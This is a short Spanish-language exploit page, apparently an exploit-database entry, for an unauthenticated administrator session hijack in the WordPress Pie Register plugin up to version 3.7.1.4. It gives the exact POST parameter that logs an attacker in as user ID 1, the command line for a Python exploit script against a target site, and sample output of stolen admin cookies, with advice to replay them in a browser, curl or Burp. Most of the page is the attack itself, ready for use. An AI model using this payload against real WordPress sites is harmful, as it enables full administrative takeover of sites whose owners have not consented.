
WordPress Pie Register ≤ 3.7.1.4 - Escalada de privilegios de administrador (no autenticado)
Mrj Haxcore
El plugin Pie Register para WordPress (versión ≤ 3.7.1.4) expone un endpoint sin autenticación que permite a un atacante secuestrar sesiones de administrador simplemente enviando un payload específico por POST.
La explotación resulta en robar las cookies de sesión del usuario ID 1 (normalmente admin) sin necesidad de credenciales de inicio de sesión.
pie-registeruser_id_social_site=1
Cuando se envía a la URL raíz (/), este parámetro hace que el plugin autentique al atacante como el usuario con ID 1 (normalmente el admin) y emita cookies de sesión válidas.
requests, beautifulsoup4 (opcional, para el análisis de cookies)python3 pie.py http://target.site
Salida [*] Enviando payload para secuestrar la sesión de administrador...
[+] Cookies secuestradas con éxito para user_id=1 (admin): wordpress_sec_xxxxxx = <cookie_value> wordpress_logged_in_xxxxxx = <cookie_value>
[!] Usa estas cookies en tu navegador o en herramientas como curl o Burp para actuar como administrador.